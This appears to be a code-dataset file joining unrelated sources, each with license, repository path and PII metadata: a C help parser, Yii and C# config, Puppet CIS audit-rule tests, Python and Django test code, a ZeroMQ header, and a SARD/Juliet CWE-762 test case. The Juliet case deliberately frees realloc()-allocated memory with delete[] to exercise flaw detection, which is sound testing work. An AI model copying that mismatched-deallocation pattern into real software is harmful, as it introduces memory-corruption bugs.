               it was never malloc()ed, so free()ing it is undefined
               behavior.  FreeHelpSysData() already guards the same way. */
            for (j = 0; j < i; j++)
                if (HelpSysData[j] != EmptyString)
                    free(HelpSysData[j]);
            free(HelpSysData);
            HelpSysData = 0;
            return HELPMEMINSUFFICIENT;
        }
    }

    return HELPSUCCESS;
}
/* Returns the number of lines produced by the last ParseHelpFile() call. */
size_t GetHelpLineCount()
{
    return AmofLines;
}
/* Returns line <line> (0-based) of the parsed help file.
   No bounds checking is performed. */
char* GetHelpLine(int line)
{
    return HelpSysData[line];
}
/* Releases every line allocated by ParseHelpFile() and the line-pointer
   array itself, then resets HelpSysData so a later call is a no-op. */
void FreeHelpSysData()
{
    int line;

    if (HelpSysData != NULL)
    {
        /* The shared empty-string sentinel was never malloc()ed and must
           not be passed to free(). */
        for (line = 0; line < AmofLines; line++)
            if (HelpSysData[line] != EmptyString)
                free(HelpSysData[line]);

        free(HelpSysData);
    }

    HelpSysData = NULL;
}
|
C
|
MPL-2.0
|
AlainODea/sdcboot/freedos/source/defrag/msdefint/helpsys/hlpparse.c
|
23003a5c-6410-408e-8ac5-50e0ca0cb732
|
[{"tag": "EMAIL", "value": "imre.leber@worldonline.be", "start": 877, "end": 902, "context": "s, suggestions, or fixes please\r\n email me at: imre.leber@worldonline.be\r\n*/\r\n\r\n#include <stdlib.h>\r\n#include <string.h>\r\n"}]
|
[{"tag": "EMAIL", "value": "imre.leber@worldonline.be", "start": 877, "end": 902, "context": "s, suggestions, or fixes please\r\n email me at: imre.leber@worldonline.be\r\n*/\r\n\r\n#include <stdlib.h>\r\n#include <string.h>\r\n"}]
|
<?php
/**
* @link http://www.yiiframework.com/
* @copyright Copyright (c) 2008 Yii Software LLC
* @license http://www.yiiframework.com/license/
*/
namespace app\assets;
use yii\web\AssetBundle;
/**
* Main application asset bundle.
*
* @author Qiang Xue <qiang.xue@gmail.com>
* @since 2.0
*/
class IndexAsset extends AssetBundle
{
    // Location of the published assets on disk and their public URL.
    public $basePath = '@webroot';
    public $baseUrl = '@web';
    // Stylesheets registered by this bundle.
    public $css = [
        'css/site.css',
    ];
    // Scripts registered by this bundle, in load order.
    public $js = [
        'js/globals.js',
        'js/main.js',
    ];
    // Bundles that must be registered before this one.
    public $depends = [
        'yii\web\YiiAsset',
        'yii\bootstrap\BootstrapAsset',
    ];
}
|
PHP
|
BSD-3-Clause
|
el-dorian/cottage/assets/IndexAsset.php
|
3c0c983b-d43b-4a2e-b04b-3c271cd71849
|
[{"tag": "NAME", "value": "Qiang Xue", "start": 253, "end": 262, "context": "*\n * Main application asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass Ind"}, {"tag": "EMAIL", "value": "qiang.xue@gmail.com", "start": 264, "end": 283, "context": "pplication asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass IndexAsset extends Asset"}]
|
[{"tag": "NAME", "value": "Qiang Xue", "start": 253, "end": 262, "context": "*\n * Main application asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass Ind"}, {"tag": "EMAIL", "value": "qiang.xue@gmail.com", "start": 264, "end": 283, "context": "pplication asset bundle.\n *\n * @author Qiang Xue <qiang.xue@gmail.com>\n * @since 2.0\n */\nclass IndexAsset extends Asset"}]
|
require 'spec_helper'
describe 'cis_hardening::logaudit::accounting' do
on_supported_os.each do |os, os_facts|
context "on #{os}" do
let(:facts) { os_facts }
# Check for default class
it { is_expected.to contain_class('cis_hardening::logaudit::accounting') }
# Ensure Auditing is enabled - Section 4.1.1
# Ensure that auditd is installed - Section 4.1.1.1
it {
is_expected.to contain_package('audit').with(
'ensure' => 'present',
)
}
it {
is_expected.to contain_package('audit-libs').with(
'ensure' => 'present',
)
}
# Ensure auditd service is enabled and running - Section 4.1.1.2
it {
is_expected.to contain_service('auditd').with(
'ensure' => 'running',
'enable' => true,
'hasstatus' => true,
'hasrestart' => true,
).that_requires('File[/etc/audit/audit.rules]')
}
it {
is_expected.to contain_exec('restart_auditd').with(
'path' => '/bin:/sbin:/usr/bin:/usr/sbin:/usr/local/bin:/usr/local/sbin',
'command' => '/bin/systemctl restart auditd',
).that_requires('Package[audit]')
}
# Ensure that Ensure auditing for processes that start prior to auditd is enabled - Section 4.1.1.3
it {
is_expected.to contain_file_line('pre_auditd_settings').with(
'ensure' => 'present',
'path' => '/etc/default/grub',
'line' => 'GRUB_CMDLINE_LINUX="audit=1"',
).that_requires('File[/etc/default/grub]')
}
it {
is_expected.to contain_file('/etc/audit/audit.rules').with(
'ensure' => 'present',
'owner' => 'root',
'group' => 'root',
'mode' => '0640',
).that_requires('Package[audit]')
}
# FIX: `is_expected.top` was a typo for `is_expected.to`; `top` is not an
# RSpec method, so this example raised NoMethodError instead of checking
# the resource.
it {
  is_expected.to contain_file_line('auditd_restart_enable').with(
    'ensure' => 'present',
    'path' => '/usr/lib/systemd/system/auditd.service',
    'line' => 'RefuseManualStop=no',
    'match' => '^RefuseManualStop\=',
  )
}
# If you leave AuditD as-is, you'll get an error because the default is to not allow AuditD to restart. For the
# purposes of CIS hardening, you have to be able to specify options and restart the service. This changes the option
# when Puppet runs. It will only be activated once booted after the Puppet run.
# Configure Data Retention - 4.1.2
# Ensure audit log storage size is configured - Section 4.1.2.1
it {
is_expected.to contain_file_line('set_auditd_logfile_size').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'max_log_file = 1024',
'match' => '^max_log_file\ \=',
).that_notifies('Exec[restart_auditd]')
}
# Ensure that Ensure audit logs are not automatically deleted - Section 4.1.2.2
it {
is_expected.to contain_file_line('set_max_logfile_action').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'max_log_file_action = keep_logs',
'match' => '^max_log_file_action\ \=',
)
}
# Ensure system is disabled when audit logs are full - Section 4.1.2.3
it {
is_expected.to contain_file_line('full_logfile_notify_action').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'space_left_action = email',
'match' => '^space_left_action\ \=',
).that_notifies('Exec[restart_auditd]')
}
it {
is_expected.to contain_file_line('set_action_mail_account').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'action_mail_acct = root',
'match' => '^action_mail_acct\ \=',
).that_notifies('Exec[restart_auditd]')
}
it {
is_expected.to contain_file_line('set_admin_space_left_action').with(
'ensure' => 'present',
'path' => '/etc/audit/auditd.conf',
'line' => 'admin_space_left_action = SYSLOG',
'match' => '^admin_space_left_action\ \=',
).that_notifies('Exec[restart_auditd]')
}
# Ensure audit_backlog_limit is sufficient - Section 4.1.2.4 - PASS
# Ensure defaults directory is present for grub settings - Section 4.1.3 prerequisites
it {
is_expected.to contain_file('/etc/default').with(
'ensure' => 'directory',
'owner' => 'root',
'group' => 'root',
'mode' => '0755',
)
}
it {
is_expected.to contain_file('/etc/default/grub').with(
'ensure' => 'file',
'owner' => 'root',
'group' => 'root',
'mode' => '0644',
).that_requires('File[/etc/default]')
}
# Ensure events that modify date and time information are collected - Section 4.1.3
it {
is_expected.to contain_file_line('time_change_64bit_item1').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S adjtimex -S settimeofday -k time-change',
)
}
it {
is_expected.to contain_file_line('time_change_64bit_item2').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S clock_settime -k time-change',
)
}
it {
is_expected.to contain_file_line('time_change_64bit_item3').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/localtime -p wa -k time-change',
)
}
# Ensure events that modify user/group information are collected - Section 4.1.4
it {
is_expected.to contain_file_line('ownerchange_group').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/group -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_passwd').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/passwd -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_gshadow').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/gshadow -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_shadow').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/shadow -p wa -k identity',
)
}
it {
is_expected.to contain_file_line('ownerchange_opasswd').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/security/opasswd -p wa -k identity',
)
}
# Ensure events that modify the system's network environment are collected - Section 4.1.5
it {
is_expected.to contain_file_line('network_namechanges').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S sethostname -S setdomainname -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_issue').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/issue -p wa -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_issuedotnet').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/issue.net -p wa -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_network').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sysconfig/network -p wa -k system-locale',
)
}
it {
is_expected.to contain_file_line('network_networkscripts').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sysconfig/network-scripts/ -p wa -k system-locale',
)
}
# Ensure events that modify the system's Mandatory Access Controls are collected - Section 4.1.6
it {
is_expected.to contain_file_line('macpolicy_selinux').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/selinux/ -p wa -k MAC-policy',
)
}
it {
is_expected.to contain_file_line('macpolicy_selinuxshare').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /usr/share/selinux/ -p wa -k MAC-policy',
)
}
# Ensure that Ensure login and logout events are collected - Section 4.1.7
it {
is_expected.to contain_file_line('lastlogin').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/log/lastlog -p wa -k logins',
)
}
it {
is_expected.to contain_file_line('faillog').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/log/faillog -p wa -k logins',
)
}
it {
is_expected.to contain_file_line('faillock').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/faillock/ -p wa -k logins',
)
}
# Ensure session initiation information is collected - Section 4.1.8
it {
is_expected.to contain_file_line('utmp_entry').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/utmp -p wa -k session',
)
}
it {
is_expected.to contain_file_line('wtmp_entry').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/wtmp -p wa -k logins',
)
}
it {
is_expected.to contain_file_line('btmp_entry').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/run/btmp -p wa -k logins',
)
}
# Ensure discretionary access control permission modification events are collected - Section 4.1.9
it {
is_expected.to contain_file_line('chmod_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S chmod -S fchmod -S fchmodat -F auid>=1000 -F auid!=4294967295 -k perm_mod',
)
}
it {
is_expected.to contain_file_line('chown_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S chown -S fchown -S fchownat -S lchown -F auid>=1000 -F auid!=4294967295 -k perm_mod',
)
}
it {
is_expected.to contain_file_line('xattr_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S setxattr -S lsetxattr -S fsetxattr -S removexattr -S lremovexattr -S fremovexattr -F auid>=1000 -F auid!=4294967295 -k perm_mod',
)
}
# Ensure unsuccessful unauthorized file access attempts are collected - Section 4.1.10
it {
is_expected.to contain_file_line('file_truncate').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S creat -S open -S openat -S truncate -S ftruncate -F exit=-EACCES -F auid>=1000 -F auid!=4294967295 -k access',
)
}
# Ensure use of privileged commands is collected - Section 4.1.11 **unused**
# Ensure succesful filesystem mounts are collected - Section 4.1.12
it {
is_expected.to contain_file_line('mount_cmds').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S mount -F auid>=1000 -F auid!=4294967295 -k mounts',
)
}
# Ensure that Ensure file deletion events by users are captured - Section 4.1.13
it {
is_expected.to contain_file_line('file_deletions').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S unlink -S unlinkat -S rename -S renameat -F auid>=1000 -F auid!=4294967295 -k delete',
)
}
# Ensure that Ensure changes to system administration scope (sudoers) is collected - Section 4.1.14
it {
is_expected.to contain_file_line('sudoers_file').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sudoers -p wa -k scope',
)
}
it {
is_expected.to contain_file_line('sudoers_dir').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /etc/sudoers.d/ -p wa -k scope',
)
}
# Ensure that Ensure system administrator actions (sudolog) are collected - Section 4.1.15
it {
is_expected.to contain_file_line('sudolog').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /var/log/sudo.log -p wa -k actions',
)
}
# Ensure that Ensure Kernel module loading and unloading are collected - Section 4.1.16
it {
is_expected.to contain_file_line('check_insmod').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /sbin/insmod -p x -k modules',
)
}
it {
is_expected.to contain_file_line('check_rmmod').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /sbin/rmmod -p x -k modules',
)
}
it {
is_expected.to contain_file_line('check_modprobe').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-w /sbin/modprobe -p x -k modules',
)
}
it {
is_expected.to contain_file_line('check_modulestate').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-a always,exit -F arch=b64 -S init_module -S delete_module -k modules',
)
}
# Ensure the audit configuration is immutable - Section 4.1.17
it {
is_expected.to contain_file_line('make_auditd_immutable').with(
'ensure' => 'present',
'path' => '/etc/audit/audit.rules',
'line' => '-e 2',
'match' => '^-e\ ',
'append_on_no_match' => true,
)
}
# Ensure manifest compiles with all dependencies
it {
is_expected.to compile.with_all_deps
}
end
end
end
|
Ruby
|
Apache-2.0
|
cvquesty/cis_hardening/.history/spec/classes/logaudit/accounting_spec_20201105103625.rb
|
84a55dc5-11d5-4d95-b3b4-3f65bdc141e2
|
[]
|
[]
|
using System.Reflection;
using System.Runtime.CompilerServices;
using System.Runtime.InteropServices;

// General Information about an assembly is controlled through the following
// set of attributes. Change these attribute values to modify the information
// associated with an assembly.
[assembly: AssemblyTitle("SMB NES ROM Text Editor")]
[assembly: AssemblyDescription("This program will let you change the text of the ROM Super Mario Bros. (JU) (PRG0) [!].nes.")]
[assembly: AssemblyConfiguration("")]
[assembly: AssemblyCompany("[sleepy]")]
[assembly: AssemblyProduct("SMB NES ROM Text Editor")]
[assembly: AssemblyCopyright("Copyright © Shawn M. Crawford 2010-2016")]
[assembly: AssemblyTrademark("")]
[assembly: AssemblyCulture("")]

// Setting ComVisible to false makes the types in this assembly not visible
// to COM components. If you need to access a type in this assembly from
// COM, set the ComVisible attribute to true on that type.
[assembly: ComVisible(false)]

// The following GUID is for the ID of the typelib if this project is exposed to COM
[assembly: Guid("7bf5d19f-560a-42f0-9a61-a1b19aca3e69")]

// Version information for an assembly consists of the following four values:
//
//      Major Version
//      Minor Version
//      Build Number
//      Revision
//
// You can specify all the values or you can default the Build and Revision Numbers
// by using the '*' as shown below:
// [assembly: AssemblyVersion("1.0.*")]
// NOTE: the '*' below lets the compiler auto-generate build/revision, while
// the file version stays pinned at 1.1.0.0.
[assembly: AssemblyVersion("1.1.0.*")]
[assembly: AssemblyFileVersion("1.1.0.0")]
|
C#
|
MIT
|
sleepy9090/smbnesromtexteditor/smbnesromtexteditor/Properties/AssemblyInfo.cs
|
b7550bf3-2402-4f92-8275-d17127b30d5f
|
[{"tag": "NAME", "value": "Shawn M. Crawford", "start": 647, "end": 664, "context": "itor\")]\n[assembly: AssemblyCopyright(\"Copyright \u00a9 Shawn M. Crawford 2010-2016\")]\n[assembly: AssemblyTrademark(\"\")]\n[a"}, {"tag": "AMBIGUOUS", "value": "1.1.0.0", "start": 1529, "end": 1536, "context": "rsion(\"1.1.0.*\")]\n[assembly: AssemblyFileVersion(\"1.1.0.0\")]\n"}]
|
[{"tag": "NAME", "value": "Shawn M. Crawford", "start": 647, "end": 664, "context": "itor\")]\n[assembly: AssemblyCopyright(\"Copyright \u00a9 Shawn M. Crawford 2010-2016\")]\n[assembly: AssemblyTrademark(\"\")]\n[a"}, {"tag": "AMBIGUOUS", "value": "1.1.0.0", "start": 1529, "end": 1536, "context": "rsion(\"1.1.0.*\")]\n[assembly: AssemblyFileVersion(\"1.1.0.0\")]\n"}]
|
# Copyright Contributors to the Amundsen project.
# SPDX-License-Identifier: Apache-2.0
import unittest
from unittest.mock import ANY
from databuilder.models.graph_serializable import (
RELATION_END_KEY, RELATION_END_LABEL, RELATION_REVERSE_TYPE, RELATION_START_KEY, RELATION_START_LABEL,
RELATION_TYPE,
)
from databuilder.models.table_source import TableSource
from databuilder.serializers import neo4_serializer, neptune_serializer
from databuilder.serializers.neptune_serializer import (
NEPTUNE_CREATION_TYPE_JOB, NEPTUNE_CREATION_TYPE_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT, NEPTUNE_HEADER_ID,
NEPTUNE_HEADER_LABEL, NEPTUNE_LAST_EXTRACTED_AT_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT,
NEPTUNE_RELATIONSHIP_HEADER_FROM, NEPTUNE_RELATIONSHIP_HEADER_TO,
)
DB = 'hive'
SCHEMA = 'base'
TABLE = 'test'
CLUSTER = 'default'
SOURCE = '/etl/sql/file.py'
class TestTableSource(unittest.TestCase):
    """Tests TableSource key construction and graph/Neptune serialization."""

    def setUp(self) -> None:
        super(TestTableSource, self).setUp()
        # Build the fixture from the module-level constants so the key
        # expectations below cannot drift out of sync (db_name previously
        # hard-coded 'hive', duplicating DB).
        self.table_source = TableSource(db_name=DB,
                                        schema=SCHEMA,
                                        table_name=TABLE,
                                        cluster=CLUSTER,
                                        source=SOURCE)
        self.start_key = f'{DB}://{CLUSTER}.{SCHEMA}/{TABLE}/_source'
        self.end_key = f'{DB}://{CLUSTER}.{SCHEMA}/{TABLE}'

    def test_get_source_model_key(self) -> None:
        source = self.table_source.get_source_model_key()
        self.assertEqual(source, f'{DB}://{CLUSTER}.{SCHEMA}/{TABLE}/_source')

    def test_get_metadata_model_key(self) -> None:
        metadata = self.table_source.get_metadata_model_key()
        self.assertEqual(metadata, 'hive://default.base/test')

    def test_create_nodes(self) -> None:
        nodes = self.table_source.create_nodes()
        self.assertEqual(len(nodes), 1)

    def test_create_relation(self) -> None:
        relations = self.table_source.create_relation()
        # FIX: assertEquals() is a deprecated alias of assertEqual().
        self.assertEqual(len(relations), 1)

        serialized_relation = neo4_serializer.serialize_relationship(relations[0])
        expected_relation = {
            RELATION_START_KEY: self.start_key,
            RELATION_START_LABEL: TableSource.LABEL,
            RELATION_END_KEY: self.end_key,
            RELATION_END_LABEL: 'Table',
            RELATION_TYPE: TableSource.SOURCE_TABLE_RELATION_TYPE,
            RELATION_REVERSE_TYPE: TableSource.TABLE_SOURCE_RELATION_TYPE
        }
        self.assertDictEqual(expected_relation, serialized_relation)

    def test_create_relation_neptune(self) -> None:
        relations = self.table_source.create_relation()
        serialized_relations = neptune_serializer.convert_relationship(relations[0])
        # Neptune serialization yields both the forward and the reverse edge.
        expected = [
            {
                NEPTUNE_HEADER_ID: "{from_vertex_id}_{to_vertex_id}_{label}".format(
                    from_vertex_id=self.start_key,
                    to_vertex_id=self.end_key,
                    label=TableSource.SOURCE_TABLE_RELATION_TYPE
                ),
                NEPTUNE_RELATIONSHIP_HEADER_FROM: self.start_key,
                NEPTUNE_RELATIONSHIP_HEADER_TO: self.end_key,
                NEPTUNE_HEADER_LABEL: TableSource.SOURCE_TABLE_RELATION_TYPE,
                NEPTUNE_LAST_EXTRACTED_AT_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: ANY,
                NEPTUNE_CREATION_TYPE_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: NEPTUNE_CREATION_TYPE_JOB
            },
            {
                NEPTUNE_HEADER_ID: "{from_vertex_id}_{to_vertex_id}_{label}".format(
                    from_vertex_id=self.end_key,
                    to_vertex_id=self.start_key,
                    label=TableSource.TABLE_SOURCE_RELATION_TYPE
                ),
                NEPTUNE_RELATIONSHIP_HEADER_FROM: self.end_key,
                NEPTUNE_RELATIONSHIP_HEADER_TO: self.start_key,
                NEPTUNE_HEADER_LABEL: TableSource.TABLE_SOURCE_RELATION_TYPE,
                NEPTUNE_LAST_EXTRACTED_AT_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: ANY,
                NEPTUNE_CREATION_TYPE_RELATIONSHIP_PROPERTY_NAME_BULK_LOADER_FORMAT: NEPTUNE_CREATION_TYPE_JOB
            }
        ]
        self.assertListEqual(expected, serialized_relations)
|
Python
|
Apache-2.0
|
JacobSMoller/amundsendatabuilder/tests/unit/models/test_table_source.py
|
69b749dd-21de-4ad7-beb1-5dd5bf908991
|
[]
|
[]
|
/* TEMPLATE GENERATED TESTCASE FILE
Filename: CWE762_Mismatched_Memory_Management_Routines__delete_array_int64_t_realloc_62b.cpp
Label Definition File: CWE762_Mismatched_Memory_Management_Routines__delete_array.label.xml
Template File: sources-sinks-62b.tmpl.cpp
*/
/*
* @description
* CWE: 762 Mismatched Memory Management Routines
* BadSource: realloc Allocate data using realloc()
* GoodSource: Allocate data using new []
* Sinks:
* GoodSink: Deallocate data using free()
* BadSink : Deallocate data using delete []
* Flow Variant: 62 Data flow: data flows using a C++ reference from one function to another in different source files
*
* */
#include "std_testcase.h"
/* NOTE: This is a generated SARD/Juliet test case for CWE-762.  The
   "POTENTIAL FLAW" allocations below are intentional test fixtures and
   must NOT be "fixed": the bad sink (delete []) in the companion file is
   meant to mismatch them. */
namespace CWE762_Mismatched_Memory_Management_Routines__delete_array_int64_t_realloc_62
{

#ifndef OMITBAD

/* Bad source: buffer allocated with realloc(), which requires free(). */
void badSource(int64_t * &data)
{
    data = NULL;
    /* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
    data = (int64_t *)realloc(data, 100*sizeof(int64_t));
}

#endif /* OMITBAD */

#ifndef OMITGOOD

/* goodG2B() uses the GoodSource with the BadSink */
void goodG2BSource(int64_t * &data)
{
    /* FIX: Allocate memory using new [] */
    data = new int64_t[100];
}

/* goodB2G() uses the BadSource with the GoodSink */
void goodB2GSource(int64_t * &data)
{
    data = NULL;
    /* POTENTIAL FLAW: Allocate memory with a function that requires free() to free the memory */
    data = (int64_t *)realloc(data, 100*sizeof(int64_t));
}

#endif /* OMITGOOD */

} /* close namespace */
|
C++
|
Apache-2.0
|
kppw99/enVAS/dataset/source/SARD/SARD-6/113515/CWE762_Mismatched_Memory_Management_Routines__delete_array_int64_t_realloc_62b.cpp
|
60ef89f2-70b5-4ba4-af35-14b5c886ed91
|
[]
|
[]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import logging
__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'
__copyright__ = "Copyright 2015, Northbridge Development Konrad & Schneider GbR"
__credits__ = ["Tim Schneider", ]
__maintainer__ = "Tim Schneider"
__email__ = "mail@northbridge-development.de"
__status__ = "Development"
logger = logging.getLogger(__name__)
import glob
import os
import sys
# Resolve the project root (two levels up) and make it importable.
BASE_DIR = os.path.abspath(os.path.join(os.path.dirname(__file__), '../..'))
# FIX: `print BASE_DIR` was Python-2-only statement syntax; the function
# form works under both Python 2 and 3.
print(BASE_DIR)
sys.path.insert(0, os.path.abspath(BASE_DIR))
# Enable coverage measurement when the ``coverage`` package is available;
# the test run still works without it.
try:
    import coverage  # Import coverage if available

    # Only measure project code, configured via coverage.conf.
    cov = coverage.coverage(
        cover_pylib=False,
        config_file=os.path.join(os.path.dirname(__file__), 'coverage.conf'),
        include='%s/*' % BASE_DIR,
    )
    cov.start()
    sys.stdout.write('Using coverage\n')
except ImportError:
    cov = None
    sys.stdout.write('Coverage not available. To evaluate the coverage, please install coverage.\n')

import django
from django.conf import settings
from django.core.management import execute_from_command_line

# Unfortunately, apps can not be installed via ``modify_settings``
# decorator, because it would miss the database setup.
INSTALLED_APPS = (
    'django_splitdate',
)

# Minimal standalone Django settings for running the app's test suite
# (in-memory-style sqlite DB, no middleware, no real URLconf work).
settings.configure(
    SECRET_KEY="django_tests_secret_key",
    DEBUG=False,
    TEMPLATE_DEBUG=False,
    ALLOWED_HOSTS=[],
    INSTALLED_APPS=INSTALLED_APPS,
    MIDDLEWARE_CLASSES=[],
    ROOT_URLCONF='tests.urls',
    DATABASES={
        'default': {
            'ENGINE': 'django.db.backends.sqlite3',
        }
    },
    LANGUAGE_CODE='en-us',
    TIME_ZONE='UTC',
    USE_I18N=True,
    USE_L10N=True,
    USE_TZ=True,
    STATIC_URL='/static/',
    # Use a fast hasher to speed up tests.
    PASSWORD_HASHERS=(
        'django.contrib.auth.hashers.MD5PasswordHasher',
    ),
    FIXTURE_DIRS=glob.glob(BASE_DIR + '/' + '*/fixtures/')
)

django.setup()
args = [sys.argv[0], 'test']
# Current module (``tests``) and its submodules.
test_cases = '.'

# Allow accessing test options from the command line.
offset = 1
try:
    sys.argv[1]
except IndexError:
    pass
else:
    option = sys.argv[1].startswith('-')
    if not option:
        # First positional argument selects which test cases to run.
        test_cases = sys.argv[1]
        offset = 2

args.append(test_cases)
# ``verbosity`` can be overwritten from command line.
#args.append('--verbosity=2')
args.extend(sys.argv[offset:])

execute_from_command_line(args)

if cov is not None:
    # Finish measurement and emit an HTML coverage report.
    sys.stdout.write('Evaluating Coverage\n')
    cov.stop()
    cov.save()
    sys.stdout.write('Generating HTML Report\n')
    cov.html_report()
|
Python
|
MIT
|
Mactory/django-splitdate/django_splitdate/tests/runtests.py
|
080a22dc-8ff8-4b6e-83fb-33439664d4de
|
[{"tag": "NAME", "value": "Tim Schneider", "start": 267, "end": 280, "context": "credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__"}, {"tag": "NAME", "value": "Tim Schneider", "start": 76, "end": 89, "context": "- coding: utf-8 -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__cop"}, {"tag": "EMAIL", "value": "mail@northbridge-development.de", "start": 295, "end": 326, "context": ", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__status__ = \"Development\"\n\nlogger = logging.get"}, {"tag": "EMAIL", "value": "tim.schneider@northbridge-development.de", "start": 91, "end": 131, "context": " -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__copyright__ = \"Copyright 2015, Northbridge De"}, {"tag": "NAME", "value": "Tim Schneider", "start": 231, "end": 244, "context": "velopment Konrad & Schneider GbR\"\n__credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = "}]
|
[{"tag": "NAME", "value": "Tim Schneider", "start": 267, "end": 280, "context": "credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__"}, {"tag": "NAME", "value": "Tim Schneider", "start": 76, "end": 89, "context": "- coding: utf-8 -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__cop"}, {"tag": "EMAIL", "value": "mail@northbridge-development.de", "start": 295, "end": 326, "context": ", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = \"mail@northbridge-development.de\"\n__status__ = \"Development\"\n\nlogger = logging.get"}, {"tag": "EMAIL", "value": "tim.schneider@northbridge-development.de", "start": 91, "end": 131, "context": " -*-\nimport logging\n\n__author__ = 'Tim Schneider <tim.schneider@northbridge-development.de>'\n__copyright__ = \"Copyright 2015, Northbridge De"}, {"tag": "NAME", "value": "Tim Schneider", "start": 231, "end": 244, "context": "velopment Konrad & Schneider GbR\"\n__credits__ = [\"Tim Schneider\", ]\n__maintainer__ = \"Tim Schneider\"\n__email__ = "}]
|
/*
Copyright (c) 2007-2013 Contributors as noted in the AUTHORS file
This file is part of 0MQ.
0MQ is free software; you can redistribute it and/or modify it under
the terms of the GNU Lesser General Public License as published by
the Free Software Foundation; either version 3 of the License, or
(at your option) any later version.
0MQ is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU Lesser General Public License for more details.
You should have received a copy of the GNU Lesser General Public License
along with this program. If not, see <http://www.gnu.org/licenses/>.
*/
#include "platform.hpp"
#ifdef ZMQ_HAVE_OPENPGM
#ifdef ZMQ_HAVE_WINDOWS
#include "windows.hpp"
#endif
#ifdef ZMQ_HAVE_LINUX
#include <poll.h>
#endif
#include <stdlib.h>
#include <string.h>
#include <string>
#include "options.hpp"
#include "pgm_socket.hpp"
#include "config.hpp"
